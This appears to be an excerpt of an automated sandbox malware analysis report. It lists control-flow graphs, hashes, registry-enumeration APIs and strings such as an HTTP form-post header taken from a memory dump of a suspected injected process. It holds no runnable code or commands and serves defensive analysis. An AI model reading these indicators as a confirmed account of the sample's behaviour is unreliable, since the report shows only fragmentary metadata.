                                                                                                                                                                                                                                          control_flow_graph 4227 4366c0-4366e7 4228 436723-436744 4227->4228 4229 4366e9-4366fd call 53f1aa 4227->4229 4230 436746-43679d call 4fb3b0 call 4f57c0 4228->4230 4231 43679f-4367a4 call 4ee6c0 4228->4231 4229->4228 4238 4366ff-436720 call 41f450 call 53f0da call 53f159 4229->4238 4237 4367a9-4367cb call 41f450 4230->4237 4231->4237 4245 436807-436828 4237->4245 4246 4367cd-4367e1 call 53f1aa 4237->4246 4238->4228 4248 436883-436888 call 4ee6c0 4245->4248 4249 43682a-436881 call 4fb3b0 call 4f57c0 4245->4249 4246->4245 4256 4367e3-436804 call 41f450 call 53f0da call 53f159 4246->4256 4259 43688d-4368a5 4248->4259 4249->4259 4256->4245 4260 4368b0-4368b4 4259->4260 4263 4368b6-4368eb 4260->4263 4264 4368ed-436929 4260->4264 4263->4260 4269 436934-436938 4264->4269 4271 436971-4369b3 call 437970 4269->4271 4272 43693a-43696f 4269->4272 4278 4369be-4369c2 4271->4278 4272->4269 4279 436a03-436a50 call 4187e0 4278->4279 4280 4369c4-436a01 4278->4280 4284 436a56-436a66 4279->4284 4280->4278 4284->4284 4285 436a68-436ad2 call 417380 call 414f60 call 414e70 call 414f60 4284->4285 4294 436ad8-436ae8 4285->4294 4294->4294 4295 436aea-436b4a call 417380 call 414f60 call 414e70 call 414f60 call 433be0 4294->4295 4305 436b4f-436ba1 call 417140 * 4 call 414fd0 4295->4305 4316 436ba3-436baa 4305->4316 4317 436be1-436be9 call 41bb40 4305->4317 4318 436bb8 4316->4318 4319 436bac-436bb6 4316->4319 4322 436bee-436bf5 4317->4322 4321 436bc2-436bcb 4318->4321 4319->4321 4321->4317 4323 436bcd-436bdf call 414e70 4321->4323 4324 436c03 4322->4324 4325 436bf7-436c01 4322->4325 4323->4322 4327 436c0d-436c16 4324->4327 4325->4327 4329 436c70-436c8e call 417140 4327->4329 4330 436c18-436c32 call 4ef210 4327->4330 4336 436c94-436cb6 call 4379f0 4329->4336 4337 436dbf 4329->4337 4335 436c38-436c48 4330->4335 4335->4335 4338 436c4a-436c6b call 4172e0 4335->4338 4345 436cc1-436cc5 4336->4345 4340 436dc9-436dd8 4337->4340 4338->4329 4343 436dda-436de4 call 417140 4340->4343 4344 436de9-436def 4340->4344 4343->4344 4347 437942-437966 call 417140 * 3 4344->4347 4348 436df5-436e0a 4344->4348 4350 436cc7-436d04 4345->4350 4351 436d06-436d56 call 41b910 4345->4351 4352 436e46-436e67 4348->4352 4353 436e0c-436e20 call 53f1aa 4348->4353 4350->4345 4368 436d5c-436d6c 4351->4368 4355 436ec5-436eca call 4ee6c0 4352->4355 4356 436e69-436ec3 call 4fb3b0 call 4f57c0 4352->4356 4353->4352 4369 436e22-436e43 call 41f450 call 53f0da call 53f159 4353->4369 4367 436ecf-436f1c call 4f47f0 4355->4367 4356->4367 4380 436f58-436f79 4367->4380 4381 436f1e-436f32 call 53f1aa 4367->4381 4368->4368 4370 436d6e-436db1 call 41a1e0 call 4f4730 4368->4370 4369->4352 4370->4337 4396 436db3-436dbd 4370->4396 4387 436fd7-436fdc call 4ee6c0 4380->4387 4388 436f7b-436fd5 call 4fb3b0 call 4f57c0 4380->4388 4381->4380 4395 436f34-436f55 call 41f450 call 53f0da call 53f159 4381->4395 4394 436fe1-43705c call 4ed810 call 4ed7d0 call 4f35f0 4387->4394 4388->4394 4414 43706a 4394->4414 4415 43705e-437068 4394->4415 4395->4380 4396->4340 4416 437074-43707d 4414->4416 4415->4416 4417 437083-4370c5 call 436600 call 4f36a0 4416->4417 4418 43781d-43785e call 417140 * 4 4416->4418 4427 4370d0-4370d4 4417->4427 4437 437860-437874 call 53f1aa 4418->4437 4438 43789a-4378bb 4418->4438 4429 4370d6-43710b 4427->4429 4430 43710d-43718a call 4f4600 call 4f48c0 call 4f36a0 call 437a40 4427->4430 4429->4427 4460 437195-437199 4430->4460 4437->4438 4449 437876-437897 call 41f450 call 53f0da call 53f159 4437->4449 4442 437919-43791e call 4ee6c0 4438->4442 4443 4378bd-437917 call 4fb3b0 call 4f57c0 4438->4443 4448 437923-43793d call 4f1460 4442->4448 4443->4448 4448->4347 4449->4438 4461 43719b-4371d8 4460->4461 4462 4371da-437299 call 4f4600 call 41b910 call 417560 call 506eb0 call 41b910 call 417560 4460->4462 4461->4460 4479 43729b-43730c call 5672b0 * 2 call 41fb00 4462->4479 4480 43730e-43731a 4462->4480 4482 437320-437348 call 414d00 call 420e20 4479->4482 4480->4482 4492 437472-4374ac call 417140 call 4f36a0 call 437a90 4482->4492 4493 43734e-437350 4482->4493 4516 4374b7-4374bb 4492->4516 4495 437352-437364 4493->4495 4496 437369-4373e9 call 5672b0 * 3 call 567190 call 41fbd0 4493->4496 4498 4373ef-43740c call 4210e0 4495->4498 4496->4498 4508 437463-43746f call 54eeae 4498->4508 4509 43740e-43741a 4498->4509 4508->4492 4513 437420-437430 4509->4513 4513->4513 4517 437432-437460 call 4172e0 call 54eeae 4513->4517 4519 4374bd-4374fa 4516->4519 4520 4374fc-4375bb call 4f4600 call 41b910 call 417560 call 506eb0 call 41b910 call 417560 4516->4520 4517->4508 4519->4516 4541 437630-43763c 4520->4541 4542 4375bd-43762e call 5672b0 * 2 call 41fb00 4520->4542 4543 437642-43766a call 414d00 call 420e20 4541->4543 4542->4543 4554 437670-437672 4543->4554 4555 437794-437818 call 417140 call 4fb680 call 4f4f10 call 437ae0 call 417140 * 5 4543->4555 4557 437674-437686 4554->4557 4558 43768b-43770b call 5672b0 * 3 call 567190 call 41fbd0 4554->4558 4555->4418 4560 437711-43772e call 4210e0 4557->4560 4558->4560 4570 437730-43773c 4560->4570 4571 437785-437791 call 54eeae 4560->4571 4575 437742-437752 4570->4575 4571->4555 4575->4575 4579 437754-437782 call 4172e0 call 54eeae 4575->4579 4579->4571
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake
                                                                                                                                                                                                                                          • String ID: :$F$eks$j3l6lrek$l$q
                                                                                                                                                                                                                                          • API String ID: 4258034872-2840958074
                                                                                                                                                                                                                                          • Opcode ID: 0fabd542b1519b0ab0cc39865efa22c4cd626f02a9fedd9b45bad23a2dab7b25
                                                                                                                                                                                                                                          • Instruction ID: 7cc07ffcf6b3f84739c149508f85475ee936f78321432c080d54a692821b2c2d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fabd542b1519b0ab0cc39865efa22c4cd626f02a9fedd9b45bad23a2dab7b25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40C288B0D042289BDB24DB64CC91BEEBBB5BF49304F0481EAE50A67341DB386E85CF55

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 4599 433be0-433d89 call 5672b0 * 2 call 41fb00 call 5672b0 call 567190 4611 434975-434996 call 41b910 4599->4611 4612 433d8f 4599->4612 4618 43499c-4349ac 4611->4618 4613 433da3-433e45 call 5672b0 * 3 call 567190 call 41fbd0 4612->4613 4614 433d91-433d9d 4612->4614 4634 433e50-433e54 4613->4634 4614->4611 4614->4613 4618->4618 4620 4349ae-4349d9 call 41a1e0 call 417140 4618->4620 4630 4349dc-4349e2 4620->4630 4635 433e56-433e8b 4634->4635 4636 433e8d-433edb call 41b910 4634->4636 4635->4634 4640 433ee1-433ef1 4636->4640 4640->4640 4641 433ef3-434045 call 41a1e0 call 410820 call 4150c0 * 2 call 410ec0 call 4f4760 call 5672b0 * 2 call 41fb00 4640->4641 4660 43404b 4641->4660 4661 43494f-434970 call 417140 call 414930 call 434ae0 4641->4661 4663 43405f-43409d call 42c510 4660->4663 4664 43404d-434059 4660->4664 4661->4611 4669 4340a8-4340ac 4663->4669 4664->4661 4664->4663 4671 4340e5-43412e call 4187e0 4669->4671 4672 4340ae-4340e3 4669->4672 4678 434130-434144 call 53f1aa 4671->4678 4679 43416a-434182 4671->4679 4672->4669 4678->4679 4688 434146-434167 call 41f450 call 53f0da call 53f159 4678->4688 4680 4341d4-4341d9 call 4ee6c0 4679->4680 4681 434184-4341d2 call 4fb3b0 call 4f57c0 4679->4681 4687 4341de-434214 call 41b910 call 417560 call 53ee6e 4680->4687 4681->4687 4703 434223 4687->4703 4704 434216-434221 call 4338e0 4687->4704 4688->4679 4706 43422a-434251 call 434a40 4703->4706 4704->4706 4710 43425c-434260 4706->4710 4711 434262-43429f 4710->4711 4712 4342a1-4342e6 call 4349f0 4710->4712 4711->4710 4716 4342f1-4342f5 4712->4716 4717 4342f7-434334 4716->4717 4718 434336-43451a call 4187e0 call 5672b0 * 2 call 41fb00 call 5672b0 call 567190 call 41b910 4716->4718 4717->4716 4734 434520-434533 4718->4734 4734->4734 4735 434535-434587 call 4f5c80 call 4150c0 4734->4735 4740 43458d-43459d 4735->4740 4740->4740 4741 43459f-4345e4 call 417380 call 414f60 call 509bd0 4740->4741 4747 4345e9-434629 call 417140 call 414fd0 4741->4747 4752 434660-434668 call 41bb40 4747->4752 4753 43462b-434632 4747->4753 4758 43466d-434674 4752->4758 4754 434634-43463b 4753->4754 4755 43463d 4753->4755 4757 434644-43464a 4754->4757 4755->4757 4757->4752 4759 43464c-43465e call 414e70 4757->4759 4760 434682 4758->4760 4761 434676-434680 4758->4761 4759->4758 4763 43468c-434695 4760->4763 4761->4763 4765 434697-4346b1 call 4ef210 4763->4765 4766 4346ef-43470d call 417140 4763->4766 4771 4346b7-4346c7 4765->4771 4772 434713-4347a2 call 4150c0 * 2 call 411340 call 4f4760 4766->4772 4773 434831-434854 call 414fd0 4766->4773 4771->4771 4774 4346c9-4346ea call 4172e0 4771->4774 4803 4347a4-434816 call 414f60 call 417140 call 414930 call 417140 * 4 call 414930 call 434ae0 call 417140 4772->4803 4804 43481b-43482c call 417140 call 414930 4772->4804 4781 434856-43485d 4773->4781 4782 434894-43489c call 41bb40 4773->4782 4774->4766 4785 43486b 4781->4785 4786 43485f-434869 4781->4786 4787 4348a1-4348a8 4782->4787 4789 434875-43487e 4785->4789 4786->4789 4790 4348b6 4787->4790 4791 4348aa-4348b4 4787->4791 4789->4782 4793 434880-434892 call 414e70 4789->4793 4795 4348c0-4348c9 4790->4795 4791->4795 4793->4787 4798 434923-43494a call 417140 * 4 4795->4798 4799 4348cb-4348e5 call 4ef210 4795->4799 4798->4661 4812 4348eb-4348fb 4799->4812 4803->4630 4804->4773 4812->4812 4816 4348fd-43491e call 4172e0 4812->4816 4816->4798
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: =Y\I\$Content-Type: application/x-www-form-urlencoded$TUT$eks$j3l6lrek
                                                                                                                                                                                                                                          • API String ID: 3732870572-2210028155
                                                                                                                                                                                                                                          • Opcode ID: 069fbda315b77a6b9962c6dc8f8bea36429eadaff6d4011824d8ddf049398435
                                                                                                                                                                                                                                          • Instruction ID: 0b39270c4957e3cb2ade4fb35155ac2488cd6917109384145b6ef13c4b05bb98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 069fbda315b77a6b9962c6dc8f8bea36429eadaff6d4011824d8ddf049398435
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60924670D002289FDB24DB69CC95BDEBBB5BF89304F1081DAE409A7291DB346E85CF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: %$&$'$)$3
                                                                                                                                                                                                                                          • API String ID: 3732870572-1175896778
                                                                                                                                                                                                                                          • Opcode ID: e355b7dadc6744a380a60176babf689acf698816c1b8020da62b292756f191c5
                                                                                                                                                                                                                                          • Instruction ID: 0034d643212e722d0324f47abe3d7b7ddad9cd6a29112c5330de8d3d63963a63
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e355b7dadc6744a380a60176babf689acf698816c1b8020da62b292756f191c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0753F270D052688FCB25DB28CC91BEEBBB5BF89308F0481DAD549A7252DB346E85CF54

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 5515 47eb60-47eb93 call 41f450 call 480960 5520 47eba4-47ebab 5515->5520 5521 47ebf2-47ec42 call 41b910 5520->5521 5522 47ebad-47ebf0 5520->5522 5526 47ec48-47ec58 5521->5526 5522->5520 5526->5526 5527 47ec5a-47edff call 41a1e0 call 4f5470 call 417140 call 541c00 call 5672b0 call 567190 call 442850 5526->5527 5543 47ee0a-47ee0e 5527->5543 5544 47ee10-47ee4d 5543->5544 5545 47ee4f-47eea8 call 41b910 5543->5545 5544->5543 5549 47eeae-47eebe 5545->5549 5549->5549 5550 47eec0-47ef3f call 41a1e0 call 442970 5549->5550 5556 47ef45-47ef84 call 4809d0 5550->5556 5557 47f2b1-47f2cf call 480b10 5550->5557 5563 47ef8f-47ef93 5556->5563 5562 47f2da-47f2de 5557->5562 5564 47f2e0-47f31d 5562->5564 5565 47f31f-47f378 call 41b910 5562->5565 5566 47ef95-47efd2 5563->5566 5567 47efd4-47f024 call 41b910 5563->5567 5564->5562 5574 47f37e-47f38e 5565->5574 5566->5563 5575 47f02a-47f03a 5567->5575 5574->5574 5576 47f390-47f40f call 41a1e0 call 442970 5574->5576 5575->5575 5577 47f03c-47f073 call 41a1e0 5575->5577 5589 47f415-47f454 call 480c40 5576->5589 5590 47f7e0-47f804 call 480d90 5576->5590 5583 47f079-47f089 5577->5583 5583->5583 5584 47f08b-47f11f call 4f89a0 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 480aa0 5583->5584 5633 47f12a-47f12e 5584->5633 5598 47f45f-47f463 5589->5598 5597 47f815-47f81c 5590->5597 5600 47f81e-47f86a 5597->5600 5601 47f86c-47f8d1 call 41b910 5597->5601 5602 47f465-47f4a2 5598->5602 5603 47f4a4-47f4fa call 41b910 5598->5603 5600->5597 5613 47f8d7-47f8ed 5601->5613 5602->5598 5614 47f500-47f516 5603->5614 5613->5613 5616 47f8ef-47f971 call 41a1e0 call 442970 5613->5616 5614->5614 5617 47f518-47f558 call 41a1e0 5614->5617 5636 47f977-47f9bc call 480f20 5616->5636 5637 47fd71-47fd95 call 4810c0 5616->5637 5626 47f55e-47f574 5617->5626 5626->5626 5629 47f576-47f613 call 4f89a0 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 480d20 5626->5629 5700 47f624-47f62b 5629->5700 5634 47f130-47f16d 5633->5634 5635 47f16f-47f1b0 call 4186f0 call 440f20 5633->5635 5634->5633 5657 47f1b5-47f1cb 5635->5657 5648 47f9cd-47f9d4 5636->5648 5649 47fda6-47fdad 5637->5649 5652 47f9d6-47fa22 5648->5652 5653 47fa24-47fa80 call 41b910 5648->5653 5655 47fdaf-47fdfb 5649->5655 5656 47fdfd-47fe62 call 41b910 5649->5656 5652->5648 5671 47fa86-47fa9c 5653->5671 5655->5649 5672 47fe68-47fe7e 5656->5672 5663 47f296-47f2ac call 417140 * 2 5657->5663 5664 47f1d1-47f1d8 5657->5664 5663->5557 5668 47f1e3-47f208 5664->5668 5668->5663 5673 47f20e-47f240 call 4ef150 5668->5673 5671->5671 5676 47fa9e-47fade call 41a1e0 5671->5676 5672->5672 5677 47fe80-47ff02 call 41a1e0 call 442970 5672->5677 5688 47f242-47f28c call 4150c0 call 417140 * 2 call 4f2110 * 2 5673->5688 5689 47f291 5673->5689 5692 47fae4-47fafa 5676->5692 5707 48030d-480488 call 541c00 call 5672b0 call 567190 call 414fd0 call 481360 5677->5707 5708 47ff08-47ff4d call 481200 5677->5708 5747 48095a-48095e 5688->5747 5689->5668 5692->5692 5696 47fafc-47fb99 call 4f89a0 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 481050 5692->5696 5773 47fbaa-47fbb1 5696->5773 5704 47f62d-47f679 5700->5704 5705 47f67b-47f6c2 call 4186f0 call 440f20 5700->5705 5704->5700 5726 47f6c7-47f6dd 5705->5726 5776 480499-4804a0 5707->5776 5722 47ff5e-47ff65 5708->5722 5727 47ff67-47ffb3 5722->5727 5728 47ffb5-480011 call 41b910 5722->5728 5732 47f7c5-47f7db call 417140 * 2 5726->5732 5733 47f6e3-47f6ed 5726->5733 5727->5722 5746 480017-48002d 5728->5746 5732->5590 5739 47f6fe-47f726 5733->5739 5739->5732 5745 47f72c-47f761 call 4ef150 5739->5745 5760 47f763-47f7bb call 4150c0 call 417140 * 2 call 4f2110 * 3 5745->5760 5761 47f7c0 5745->5761 5746->5746 5751 48002f-48006f call 41a1e0 5746->5751 5767 480075-48008b 5751->5767 5760->5747 5761->5739 5767->5767 5771 48008d-48012a call 4f89a0 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 4812f0 5767->5771 5851 48013b-480142 5771->5851 5779 47fbb3-47fbff 5773->5779 5780 47fc01-47fc63 call 4186f0 call 440f20 5773->5780 5777 4804f0-48052b call 4ef0b0 5776->5777 5778 4804a2-4804ee 5776->5778 5796 480531-480555 call 4813c0 5777->5796 5797 480616-48063a call 481420 5777->5797 5778->5776 5779->5773 5803 47fd56-47fd6c call 417140 * 2 5780->5803 5804 47fc69-47fc73 5780->5804 5813 480566-48056d 5796->5813 5811 48064b-480652 5797->5811 5803->5637 5809 47fc84-47fcac 5804->5809 5809->5803 5816 47fcb2-47fce7 call 4ef150 5809->5816 5817 4806a2-4806ef call 4186f0 call 414d00 call 42c670 5811->5817 5818 480654-4806a0 5811->5818 5820 4805bd-480611 call 414fd0 call 414e70 call 417140 5813->5820 5821 48056f-4805bb 5813->5821 5836 47fd51 5816->5836 5837 47fce9-47fd4c call 4150c0 call 417140 * 2 call 4f2110 * 4 5816->5837 5852 4806f4-4806f9 5817->5852 5818->5811 5820->5797 5821->5813 5836->5809 5837->5747 5854 480192-4801f4 call 4186f0 call 440f20 5851->5854 5855 480144-480190 5851->5855 5856 4806ff-480723 call 481510 5852->5856 5857 480900-480957 call 414fd0 call 417140 * 2 call 4f2110 * 5 5852->5857 5878 4801fa-480204 5854->5878 5879 4802f2-480308 call 417140 * 2 5854->5879 5855->5851 5868 480734-48073b 5856->5868 5857->5747 5872 48078b-4807ed call 4186f0 call 440f20 5868->5872 5873 48073d-480789 5868->5873 5900 4807f3-4807fd 5872->5900 5901 4808f5-4808fb call 417140 5872->5901 5873->5868 5883 480215-48023d 5878->5883 5879->5707 5883->5879 5888 480243-480278 call 4ef150 5883->5888 5905 48027a-4802e8 call 4150c0 call 417140 * 2 call 4f2110 * 5 5888->5905 5906 4802ed 5888->5906 5907 48080e-480838 5900->5907 5901->5857 5905->5747 5906->5883 5907->5901 5912 48083e-480873 call 4ef150 5907->5912 5921 4808f0 5912->5921 5922 480875-4808ee call 4150c0 call 417140 * 3 call 4f2110 * 5 5912->5922 5921->5907 5922->5747
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: %$&$'$)$3
                                                                                                                                                                                                                                          • API String ID: 3732870572-1175896778
                                                                                                                                                                                                                                          • Opcode ID: f0a6a586697c3083da832cb4fa827dce99411200574c8feadcf73ca1ec49d641
                                                                                                                                                                                                                                          • Instruction ID: 76545cefedcf0f882da335e4038d0771dff4b3793334e29289a3aa2004b31255
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0a6a586697c3083da832cb4fa827dce99411200574c8feadcf73ca1ec49d641
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD13F370D052688FCB29DB68CC91BEDBBB5BF49304F0481DAD50AA7252DB346E85CF58

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 5956 442970-442996 5957 4429d2-4429ea 5956->5957 5958 442998-4429ac call 53f1aa 5956->5958 5960 442a3c-442a41 call 4ee6c0 5957->5960 5961 4429ec-442a3a call 4fb3b0 call 4f57c0 5957->5961 5958->5957 5967 4429ae-4429cf call 41f450 call 53f0da call 53f159 5958->5967 5966 442a46-442a77 call 41f450 call 414fd0 5960->5966 5961->5966 5978 442aae-442ab6 call 41bb40 5966->5978 5979 442a79-442a80 5966->5979 5967->5957 5985 442abb-442ac2 5978->5985 5982 442a82-442a89 5979->5982 5983 442a8b 5979->5983 5986 442a92-442a98 5982->5986 5983->5986 5987 442ac4-442acb 5985->5987 5988 442acd 5985->5988 5986->5978 5989 442a9a-442aac call 414e70 5986->5989 5991 442ad4-442ada 5987->5991 5988->5991 5989->5985 5993 442b34-442d14 call 417140 call 5672b0 call 567190 call 414d00 call 5672b0 * 2 call 41fb00 RegOpenKeyExA 5991->5993 5994 442adc-442af6 call 4ef210 5991->5994 6014 4434ef-443513 call 41b910 5993->6014 6015 442d1a-442d26 5993->6015 6000 442afc-442b0c 5994->6000 6000->6000 6002 442b0e-442b2f call 4172e0 6000->6002 6002->5993 6021 443519-443529 6014->6021 6015->6014 6016 442d2c-442d4f call 414fd0 6015->6016 6022 442d86-442d8e call 41bb40 6016->6022 6023 442d51-442d58 6016->6023 6021->6021 6024 44352b-443564 call 41a1e0 6021->6024 6031 442d93-442d9a 6022->6031 6025 442d63 6023->6025 6026 442d5a-442d61 6023->6026 6033 4435a4-4435ac call 41bb40 6024->6033 6034 443566-44356d 6024->6034 6029 442d6a-442d70 6025->6029 6026->6029 6029->6022 6032 442d72-442d84 call 414e70 6029->6032 6035 442da5 6031->6035 6036 442d9c-442da3 6031->6036 6032->6031 6046 4435b1-4435b8 6033->6046 6038 44356f-443579 6034->6038 6039 44357b 6034->6039 6040 442dac-442db2 6035->6040 6036->6040 6043 443585-44358e 6038->6043 6039->6043 6044 442db4-442dce call 4ef210 6040->6044 6045 442e0c-442e73 call 417140 RegEnumKeyExA 6040->6045 6043->6033 6048 443590-4435a2 call 414e70 6043->6048 6056 442dd4-442de4 6044->6056 6063 442e75 6045->6063 6064 442e7a-442e9c call 443650 6045->6064 6050 4435c6 6046->6050 6051 4435ba-4435c4 6046->6051 6048->6046 6053 4435d0-4435d9 6050->6053 6051->6053 6057 443633-44364e call 417140 * 2 6053->6057 6058 4435db-4435f5 call 4ef210 6053->6058 6056->6056 6061 442de6-442e07 call 4172e0 6056->6061 6071 4435fb-44360b 6058->6071 6061->6045 6068 4432b1-4432d5 call 41b910 6063->6068 6077 442ea7-442eab 6064->6077 6079 4432db-4432eb 6068->6079 6071->6071 6076 44360d-44362e call 4172e0 6071->6076 6076->6057 6081 442eec-442f36 call 41b910 6077->6081 6082 442ead-442eea 6077->6082 6079->6079 6084 4432ed-443326 call 41a1e0 6079->6084 6088 442f3c-442f4c 6081->6088 6082->6077 6091 443366-44336e call 41bb40 6084->6091 6092 443328-44332f 6084->6092 6088->6088 6090 442f4e-442fa9 call 41a1e0 call 41b910 6088->6090 6109 442faf-442fbf 6090->6109 6099 443373-44337a 6091->6099 6094 443331-44333b 6092->6094 6095 44333d 6092->6095 6098 443347-443350 6094->6098 6095->6098 6098->6091 6101 443352-443364 call 414e70 6098->6101 6102 44337c-443386 6099->6102 6103 443388 6099->6103 6101->6099 6104 443392-44339b 6102->6104 6103->6104 6107 4433f5-443414 call 417140 6104->6107 6108 44339d-4433b7 call 4ef210 6104->6108 6118 443416-44342a call 53f1aa 6107->6118 6119 443450-443471 6107->6119 6117 4433bd-4433cd 6108->6117 6109->6109 6113 442fc1-443010 call 41a1e0 call 4f4730 6109->6113 6134 443016-443038 call 4436d0 6113->6134 6135 4431b7 6113->6135 6117->6117 6121 4433cf-4433f0 call 4172e0 6117->6121 6118->6119 6133 44342c-44344d call 41f450 call 53f0da call 53f159 6118->6133 6122 443473-4434ca call 4fb3b0 call 4f57c0 6119->6122 6123 4434cc-4434d1 call 4ee6c0 6119->6123 6121->6107 6132 4434d6-4434e9 RegCloseKey 6122->6132 6123->6132 6132->6014 6133->6119 6146 443043-443047 6134->6146 6136 4431be-4431ca 6135->6136 6142 4431cc-4431d6 call 417140 6136->6142 6143 4431db-4431e1 6136->6143 6142->6143 6148 4431f2-4431f8 6143->6148 6149 4431e3-4431ed call 417140 6143->6149 6151 443088-4430d2 call 41b910 6146->6151 6152 443049-443086 6146->6152 6154 443209-44320f 6148->6154 6155 4431fa-443204 call 417140 6148->6155 6149->6148 6168 4430d8-4430e8 6151->6168 6152->6146 6160 443220-443226 6154->6160 6161 443211-44321b call 417140 6154->6161 6155->6154 6163 4432ac 6160->6163 6164 44322c-443252 call 41b910 6160->6164 6161->6160 6163->6068 6171 443258-443268 6164->6171 6168->6168 6170 4430ea-443145 call 41a1e0 call 41b910 6168->6170 6180 44314b-44315b 6170->6180 6171->6171 6173 44326a-4432a7 call 41a1e0 call 4f5470 call 417140 6171->6173 6173->6163 6180->6180 6182 44315d-4431ac call 41a1e0 call 4f4730 6180->6182 6182->6135 6188 4431ae-4431b5 6182->6188 6188->6136
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00442C37
                                                                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,00000000,eks), ref: 00442E60
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,?,00000000,?,?), ref: 00442CE9
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireRelease$ConditionEnumOpenVariableWake__aulldiv
                                                                                                                                                                                                                                          • String ID: eks$j3l6lrek
                                                                                                                                                                                                                                          • API String ID: 2427947366-388657971
                                                                                                                                                                                                                                          • Opcode ID: fcfbb1846bf8a3f8207199c42c908c7df708a6eae263a41b0eacba31469e2b15
                                                                                                                                                                                                                                          • Instruction ID: 08fac814bacb05f198c375bebecb25a3a60c5f102c261e7047808d5fa7220acc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcfbb1846bf8a3f8207199c42c908c7df708a6eae263a41b0eacba31469e2b15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE822270D042289FEB24CFA5C995BEEBBB1BF49304F1081DAE509A7281DB746E85CF54

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
